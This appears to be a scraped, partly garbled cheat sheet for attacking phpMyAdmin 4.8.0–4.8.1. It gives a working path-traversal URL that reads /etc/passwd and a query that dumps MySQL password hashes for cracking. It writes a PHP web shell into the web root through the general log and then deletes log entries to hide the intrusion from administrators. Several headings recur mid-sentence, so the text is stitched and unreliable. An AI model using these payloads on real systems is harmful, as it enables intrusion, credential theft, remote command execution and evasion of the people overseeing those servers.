Unauthenticated local file inclusion → RCE (phpMyAdmin 4.8.0 – 4.8.1)
Check it live:
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd
To get RCE:
SELECT user, authentication_string FROM mysql.user;
Crack them with John or Hashcat (caching_sha2_password is tougher, but mysql_native_password is crackable). phpmyadmin hacktricks
If INTO OUTFILE is blocked, use MySQL logs: Unauthenticated local file inclusion → RCE (phpMyAdmin 4
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';
Check config.inc.php (often readable):
DBA’s don’t like surprises. Clear your steps: To get RCE: SELECT user, authentication_string FROM mysql
DELETE FROM mysql.general_log WHERE argument LIKE '%OUTFILE%';
DELETE FROM mysql.slow_log WHERE sql_text LIKE '%php%';